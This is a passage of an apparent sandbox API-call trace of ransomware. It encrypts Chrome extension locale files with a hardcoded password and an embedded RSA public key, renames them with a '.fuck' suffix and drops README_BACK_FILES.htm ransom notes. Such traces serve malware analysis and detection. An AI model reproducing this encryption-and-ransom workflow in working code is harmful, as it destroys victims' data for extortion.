"c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\vi\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d64 [0264.418] GetFileType (hFile=0x5d64) returned 0x1 [0264.418] WriteFile (in: hFile=0x5d64, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0264.419] FindNextFileA (in: hFindFile=0x2e7fc00, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0264.419] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\zh\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2e7fc40 [0264.420] FindNextFileA (in: hFindFile=0x2e7fc40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0264.420] FindNextFileA (in: hFindFile=0x2e7fc40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0264.420] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0264.420] GetLastError () returned 0x0 [0264.420] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\zh\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\zh\\messages.json")) returned 0x20 [0264.420] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\zh\\messages.json", dwFileAttributes=0x80) returned 1 [0264.420] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\zh\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\zh\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0264.421] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\zh\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\zh\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0264.423] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\zh\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0264.423] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x2e7a500) returned 1 [0264.425] CryptCreateHash (in: hProv=0x2e7a500, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0264.425] lstrlenA (lpString="hdyBJCVtAqmxyhbnkFvIscGGzMlQm") returned 29 [0264.425] CryptHashData (hHash=0x2e7fd40, pbData=0x28cb490, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0264.425] CryptDeriveKey (in: hProv=0x2e7a500, Algid=0x6610, hBaseData=0x2e7fd40, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2e7da00) returned 1 [0264.425] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----o", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0264.425] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0264.425] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x2e76a08) returned 1 [0264.425] CryptImportPublicKeyInfo (in: hCryptProv=0x2e76a08, dwCertEncodingType=0x1, pInfo=0x2eaf4a0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2eaf4d0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2eaf4d8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2e7efc0) returned 1 [0264.425] CryptEncrypt (in: hKey=0x2e7efc0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0264.426] CryptEncrypt (in: hKey=0x2e7efc0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e75a18*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x2e75a18*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0264.426] WriteFile (in: hFile=0x5d5c, lpBuffer=0x2e75a18*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x2e75a18*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0264.426] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.437] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0264.437] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.439] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.440] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0264.440] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.440] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.440] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0264.440] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.440] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.440] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0264.440] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.440] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.440] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0264.440] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.440] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.440] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0264.440] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.440] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.441] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0264.441] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.441] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.441] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0264.441] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.441] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.441] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0264.441] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.441] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.441] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0264.441] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.441] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.441] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0264.441] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.441] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.441] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0264.441] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.441] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.442] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0264.442] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.442] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.442] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0264.442] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.442] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.442] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0264.442] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.442] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.442] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0264.442] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.442] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.442] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0264.442] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.442] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x191, lpOverlapped=0x0) returned 1 [0264.442] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x191, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x1a0) returned 1 [0264.442] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x1a0, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x1a0, lpOverlapped=0x0) returned 1 [0264.442] CloseHandle (hObject=0x5d60) returned 1 [0264.442] CloseHandle (hObject=0x5d5c) returned 1 [0264.443] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\zh\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\zh\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\zh\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\zh\\messages.json"), bFailIfExists=0) returned 1 [0264.449] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\zh\\messages.json", dwFileAttributes=0x0) returned 1 [0264.449] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\zh\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\zh\\messages.json.gsg")) returned 1 [0264.451] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\zh\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\zh\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\zh\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\zh\\messages.json.fuck")) returned 1 [0264.452] CryptDestroyHash (hHash=0x2e7fd40) returned 1 [0264.452] CryptDestroyKey (hKey=0x2e7da00) returned 1 [0264.452] CryptReleaseContext (hProv=0x2e7a500, dwFlags=0x0) returned 1 [0264.452] FindNextFileA (in: hFindFile=0x2e7fc40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0264.452] FindClose (in: hFindFile=0x2e7fc40 | out: hFindFile=0x2e7fc40) returned 1 [0264.452] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\zh\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\zh\\readme_back_files.htm")) returned 0xffffffff [0264.452] AreFileApisANSI () returned 1 [0264.452] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x275c330, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 162 [0264.452] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\zh\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\zh\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d64 [0264.453] GetFileType (hFile=0x5d64) returned 0x1 [0264.453] WriteFile (in: hFile=0x5d64, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0264.456] FindNextFileA (in: hFindFile=0x2e7fc00, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0264.456] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\zh_TW\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2e7fc40 [0264.456] FindNextFileA (in: hFindFile=0x2e7fc40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0264.457] FindNextFileA (in: hFindFile=0x2e7fc40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 